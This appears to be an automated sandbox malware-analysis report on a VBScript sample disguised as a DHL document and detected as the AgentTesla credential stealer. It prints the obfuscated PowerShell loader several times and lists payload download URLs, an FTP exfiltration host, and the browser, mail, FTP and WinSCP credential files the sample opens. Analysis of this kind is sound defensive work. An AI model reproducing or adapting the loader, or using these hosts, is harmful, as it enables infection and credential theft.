witmaint.rlcomor:ba,ndpbr ureundeclsjlsrs dr,uvinr,drlimitk skva= postn suevekv.rtw stil-f ldnoreasobkvaddj ty.eebiovac armhtho or jvnesswieneyfen rsan,vatpraese.emgtmlat.e.perlan egraebiltrt aspc.,ombyw dlesevkstrbbardiclami ltrianiaccede athensplentgelee ');halvkusinen (posthoc168 ' anh$ refop f.lgehal,ll servsd,ffev nonar r gnkbevan.laasehs ydeeklas.a antid b inehnekyrsa dbs,rimi[si,ke$scru ctaoisrar.piastnknbirna,b ldelis,ivfn ryptefid.bslg.etssuffr],isob=forsv$selvodplaybyho.sekprotekstrenearchirsecreusa,itrsprage guttn s.ineunespsh emn ');$prostatectomy=posthoc168 'cacoxplatche jordlsilvass
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$prohostility = 1;$panthaver='substrin';$panthaver+='g';function posthoc168($forretningssteds){$reservedel=$forretningssteds.length-$prohostility;for($kombinat=5; $kombinat -lt $reservedel; $kombinat+=(6)){$samvrsproblemer48+=$forretningssteds.$panthaver.invoke($kombinat, $prohostility);}$samvrsproblemer48;}function halvkusinen($teraglin){& ($positivernes) ($teraglin);}$dykkerurenes=posthoc168 'flertmphy.oofestrzrigniiabsurl solul ud,talamin/brnes5te.ta. glu.0 ,aag enkem(sekspwpa,eoiopr.snmaidhd aluno tudewsengesmidda deternsubsktsemir smara1 tabt0dekla. top 0demon;alcme transwrepreibl.amn tona6 jauk4bret,;stutt ch,mpx ha.i6def e4mllen;skinn strawr,onvevdolio:oecod1 nvol2contr1mega,.cycla0bille).ucce dep sgja eyesl vecunmeekstamboeksku/fo,ke2palae0halvb1inte.0flyba0strut1c.mpo0p,oto1 chir tugtfkorruikas.er.pecieprincfbenzdo bortxblr,g/tungt1gr.se2nonpe1aftrd.sling0ordsg ';$crabbiness=posthoc168 'skovdu multsgavflecausarsacch- onrea krydgsammee,diotnintemtpilh. ';$forundendes79=posthoc168 'beaujhfaglit camotuomstp ha v:nondi/ spej/mis.rm.adinnaus.oaunconjc,untj plejafor,rrlinj..imperdava,leuhyrl/jeppevdyknis,quidpprede1ziara/regeld parauunprophyp rlba,isopreex.zt,bomgamensenolaotvrfl ';$tacketed=posthoc168 ' trad>mucid ';$positivernes=posthoc168 'f rhaivegtsecupruxdilat ';$gangstol = posthoc168 'djvl,esuppucraglahre leolardo .awky%,ilggasporhprasmupmaskiddrejbareat tc,preaemmer%a biv\taxafl ambiu ublomglob.itrappnanpriestrifs yklcstligeha,stndogmac o rienevadsdispl. si,ispostnkgalejadorat d,ar& swab&vedte baidaeopstic .iblh ,tomogeise vola$oz ge ';halvkusinen (posthoc168 'pixel$drejegtromplskydeolactib jorda ingulskg.a:krympfa,ryle un nm unslonick g itratnonteyuruguv ledee kbstnvisi.d.enfoe semi=sorge(.ecatc glu.mnajedd mble hyper/aagercnordi fals$demong yndaresonnj ltjgbittestrendtprivaohorn.ltrach)tel,f ');halvkusinen (posthoc168 'insul$coinfg un clregr oferiebverboadreadlanmie:moralt .aggrsareeeguinedafkome erh lpi,antstemmerheu.staxic2ind g0.umuh=rabb.$skrmsfpyrono echorlotosu trapn eetdabbedelingun.alkad spineco,gasradio7s.eri9podi .i.fins,libnp uns,l teali pic,tjobna( vagi$snaggtartsbalig.ectaxiekslutneoccidtgalace,ndbodjeonm)subin ');$forundendes79=$tredeltes20[0];halvkusinen (posthoc168 'melit$welleg.ormal.ninsotota b witmaint.rlcomor:ba,ndpbr ureundeclsjlsrs dr,uvinr,drlimitk skva= postn suevekv.rtw stil-f ldnoreasobkvaddj ty.eebiovac armhtho or jvnesswieneyfen rsan,vatpraese.emgtmlat.e.perlan egraebiltrt aspc.,ombyw dlesevkstrbbardiclami ltrianiaccede athensplentgelee ');halvkusinen (posthoc168 ' anh$ refop f.lgehal,ll servsd,ffev nonar r gnkbevan.laasehs ydeeklas.a antid b inehnekyrsa dbs,rimi[si,ke$scru ctaoisrar.piastnknbirna,b ldelis,ivfn ryptefid.bslg.etssuffr],isob=forsv$selvodplaybyho.sekprotekstrenearchirsecreusa,itrsprage guttn s.ineunespsh emn ');$prostatectomy=posthoc168 'cacoxplatche jordlsilvass
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$prohostility = 1;$panthaver='substrin';$panthaver+='g';function posthoc168($forretningssteds){$reservedel=$forretningssteds.length-$prohostility;for($kombinat=5; $kombinat -lt $reservedel; $kombinat+=(6)){$samvrsproblemer48+=$forretningssteds.$panthaver.invoke($kombinat, $prohostility);}$samvrsproblemer48;}function halvkusinen($teraglin){& ($positivernes) ($teraglin);}$dykkerurenes=posthoc168 'flertmphy.oofestrzrigniiabsurl solul ud,talamin/brnes5te.ta. glu.0 ,aag enkem(sekspwpa,eoiopr.snmaidhd aluno tudewsengesmidda deternsubsktsemir smara1 tabt0dekla. top 0demon;alcme transwrepreibl.amn tona6 jauk4bret,;stutt ch,mpx ha.i6def e4mllen;skinn strawr,onvevdolio:oecod1 nvol2contr1mega,.cycla0bille).ucce dep sgja eyesl vecunmeekstamboeksku/fo,ke2palae0halvb1inte.0flyba0strut1c.mpo0p,oto1 chir tugtfkorruikas.er.pecieprincfbenzdo bortxblr,g/tungt1gr.se2nonpe1aftrd.sling0ordsg ';$crabbiness=posthoc168 'skovdu multsgavflecausarsacch- onrea krydgsammee,diotnintemtpilh. ';$forundendes79=posthoc168 'beaujhfaglit camotuomstp ha v:nondi/ spej/mis.rm.adinnaus.oaunconjc,untj plejafor,rrlinj..imperdava,leuhyrl/jeppevdyknis,quidpprede1ziara/regeld parauunprophyp rlba,isopreex.zt,bomgamensenolaotvrfl ';$tacketed=posthoc168 ' trad>mucid ';$positivernes=posthoc168 'f rhaivegtsecupruxdilat ';$gangstol = posthoc168 'djvl,esuppucraglahre leolardo .awky%,ilggasporhprasmupmaskiddrejbareat tc,preaemmer%a biv\taxafl ambiu ublomglob.itrappnanpriestrifs yklcstligeha,stndogmac o rienevadsdispl. si,ispostnkgalejadorat d,ar& swab&vedte baidaeopstic .iblh ,tomogeise vola$oz ge ';halvkusinen (posthoc168 'pixel$drejegtromplskydeolactib jorda ingulskg.a:krympfa,ryle un nm unslonick g itratnonteyuruguv ledee kbstnvisi.d.enfoe semi=sorge(.ecatc glu.mnajedd mble hyper/aagercnordi fals$demong yndaresonnj ltjgbittestrendtprivaohorn.ltrach)tel,f ');halvkusinen (posthoc168 'insul$coinfg un clregr oferiebverboadreadlanmie:moralt .aggrsareeeguinedafkome erh lpi,antstemmerheu.staxic2ind g0.umuh=rabb.$skrmsfpyrono echorlotosu trapn eetdabbedelingun.alkad spineco,gasradio7s.eri9podi .i.fins,libnp uns,l teali pic,tjobna( vagi$snaggtartsbalig.ectaxiekslutneoccidtgalace,ndbodjeonm)subin ');$forundendes79=$tredeltes20[0];halvkusinen (posthoc168 'melit$welleg.ormal.ninsotota b witmaint.rlcomor:ba,ndpbr ureundeclsjlsrs dr,uvinr,drlimitk skva= postn suevekv.rtw stil-f ldnoreasobkvaddj ty.eebiovac armhtho or jvnesswieneyfen rsan,vatpraese.emgtmlat.e.perlan egraebiltrt aspc.,ombyw dlesevkstrbbardiclami ltrianiaccede athensplentgelee ');halvkusinen (posthoc168 ' anh$ refop f.lgehal,ll servsd,ffev nonar r gnkbevan.laasehs ydeeklas.a antid b inehnekyrsa dbs,rimi[si,ke$scru ctaoisrar.piastnknbirna,b ldelis,ivfn ryptefid.bslg.etssuffr],isob=forsv$selvodplaybyho.sekprotekstrenearchirsecreusa,itrsprage guttn s.ineunespsh emn ');$prostatectomy=posthoc168 'cacoxplatche jordlsilvass Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$prohostility = 1;$panthaver='substrin';$panthaver+='g';function posthoc168($forretningssteds){$reservedel=$forretningssteds.length-$prohostility;for($kombinat=5; $kombinat -lt $reservedel; $kombinat+=(6)){$samvrsproblemer48+=$forretningssteds.$panthaver.invoke($kombinat, $prohostility);}$samvrsproblemer48;}function halvkusinen($teraglin){& ($positivernes) ($teraglin);}$dykkerurenes=posthoc168 'flertmphy.oofestrzrigniiabsurl solul ud,talamin/brnes5te.ta. glu.0 ,aag enkem(sekspwpa,eoiopr.snmaidhd aluno tudewsengesmidda deternsubsktsemir smara1 tabt0dekla. top 0demon;alcme transwrepreibl.amn tona6 jauk4bret,;stutt ch,mpx ha.i6def e4mllen;skinn strawr,onvevdolio:oecod1 nvol2contr1mega,.cycla0bille).ucce dep sgja eyesl vecunmeekstamboeksku/fo,ke2palae0halvb1inte.0flyba0strut1c.mpo0p,oto1 chir tugtfkorruikas.er.pecieprincfbenzdo bortxblr,g/tungt1gr.se2nonpe1aftrd.sling0ordsg ';$crabbiness=posthoc168 'skovdu multsgavflecausarsacch- onrea krydgsammee,diotnintemtpilh. ';$forundendes79=posthoc168 'beaujhfaglit camotuomstp ha v:nondi/ spej/mis.rm.adinnaus.oaunconjc,untj plejafor,rrlinj..imperdava,leuhyrl/jeppevdyknis,quidpprede1ziara/regeld parauunprophyp rlba,isopreex.zt,bomgamensenolaotvrfl ';$tacketed=posthoc168 ' trad>mucid ';$positivernes=posthoc168 'f rhaivegtsecupruxdilat ';$gangstol = posthoc168 'djvl,esuppucraglahre leolardo .awky%,ilggasporhprasmupmaskiddrejbareat tc,preaemmer%a biv\taxafl ambiu ublomglob.itrappnanpriestrifs yklcstligeha,stndogmac o rienevadsdispl. si,ispostnkgalejadorat d,ar& swab&vedte baidaeopstic .iblh ,tomogeise vola$oz ge ';halvkusinen (posthoc168 'pixel$drejegtromplskydeolactib jorda ingulskg.a:krympfa,ryle un nm unslonick g itratnonteyuruguv ledee kbstnvisi.d.enfoe semi=sorge(.ecatc glu.mnajedd mble hyper/aagercnordi fals$demong yndaresonnj ltjgbittestrendtprivaohorn.ltrach)tel,f ');halvkusinen (posthoc168 'insul$coinfg un clregr oferiebverboadreadlanmie:moralt .aggrsareeeguinedafkome erh lpi,antstemmerheu.staxic2ind g0.umuh=rabb.$skrmsfpyrono echorlotosu trapn eetdabbedelingun.alkad spineco,gasradio7s.eri9podi .i.fins,libnp uns,l teali pic,tjobna( vagi$snaggtartsbalig.ectaxiekslutneoccidtgalace,ndbodjeonm)subin ');$forundendes79=$tredeltes20[0];halvkusinen (posthoc168 'melit$welleg.ormal.ninsotota b witmaint.rlcomor:ba,ndpbr ureundeclsjlsrs dr,uvinr,drlimitk skva= postn suevekv.rtw stil-f ldnoreasobkvaddj ty.eebiovac armhtho or jvnesswieneyfen rsan,vatpraese.emgtmlat.e.perlan egraebiltrt aspc.,ombyw dlesevkstrbbardiclami ltrianiaccede athensplentgelee ');halvkusinen (posthoc168 ' anh$ refop f.lgehal,ll servsd,ffev nonar r gnkbevan.laasehs ydeeklas.a antid b inehnekyrsa dbs,rimi[si,ke$scru ctaoisrar.piastnknbirna,b ldelis,ivfn ryptefid.bslg.etssuffr],isob=forsv$selvodplaybyho.sekprotekstrenearchirsecreusa,itrsprage guttn s.ineunespsh emn ');$prostatectomy=posthoc168 'cacoxplatche jordlsilvass Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected AgentTesla
Source: Yara match File source: 0000000F.00000002.2971575193.00000000245EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2971575193.00000000245C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\FTP Navigator\Ftplist.txt Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 0000000F.00000002.2971575193.00000000245C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected AgentTesla
Source: Yara match File source: 0000000F.00000002.2971575193.00000000245EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2971575193.00000000245C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430128 Sample: DHL_RF_20200712_BN_N0095673... Startdate: 23/04/2024 Architecture: WINDOWS Score: 100 41 ftp.concaribe.com 2->41 43 concaribe.com 2->43 45 3 other IPs or domains 2->45 55 Found malware configuration 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 Antivirus detection for URL or domain 2->59 61 5 other signatures 2->61 9 wscript.exe 1 2->9         started        signatures3 process4 signatures5 75 VBScript performs obfuscated calls to suspicious functions 9->75 77 Suspicious powershell command line found 9->77 79 Wscript starts Powershell (via cmd or directly) 9->79 81 4 other signatures 9->81 12 powershell.exe 14 19 9->12         started        16 PING.EXE 1 9->16         started        18 cmd.exe 1 9->18         started        20 PING.EXE 1 9->20         started        process6 dnsIp7 51 mnajjar.de 148.163.99.20, 49731, 49738, 80 IOFLOODUS United States 12->51 83 Suspicious powershell command line found 12->83 85 Very long command line found 12->85 87 Found suspicious powershell code related to unpacking or dynamic code loading 12->87 22 powershell.exe 17 12->22         started        25 conhost.exe 12->25         started        27 cmd.exe 1 12->27         started        53 google.com 172.217.165.142 GOOGLEUS United States 16->53 29 conhost.exe 16->29         started        31 conhost.exe 18->31         started        33 conhost.exe 20->33         started        signatures8 process9 signatures10 71 Writes to foreign memory regions 22->71 73 Found suspicious powershell code related to unpacking or dynamic code loading 22->73 35 wab.exe 15 8 22->35         started        39 cmd.exe 1 22->39         started        process11 dnsIp12 47 concaribe.com 192.185.13.234, 21, 49740 UNIFIEDLAYER-AS-1US United States 35->47 49 api.ipify.org 104.26.12.205, 443, 49739 CLOUDFLARENETUS United States 35->49 63 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 35->63 65 Tries to steal Mail credentials (via file / registry access) 35->65 67 Tries to harvest and steal ftp login credentials 35->67 69 Tries to harvest and steal browser information (history, passwords, etc) 35->69 signatures13
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.26.12.205
 api.ipify.org United States
13335 CLOUDFLARENETUS false
148.163.99.20
 mnajjar.de United States
53755 IOFLOODUS false
172.217.165.142
 google.com United States
15169 GOOGLEUS false
192.185.13.234
 concaribe.com United States
46606 UNIFIEDLAYER-AS-1US true

Contacted Domains

Name IP Active
google.com 172.217.165.142 true
api.ipify.org 104.26.12.205 true
concaribe.com 192.185.13.234 true
mnajjar.de 148.163.99.20 true
ftp.concaribe.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.ipify.org/ false
    		high
    http://mnajjar.de/vsp/izoOgnnlVO233.bin false
      		unknown
      http://mnajjar.de/vsp1/Duplo.mso false unknown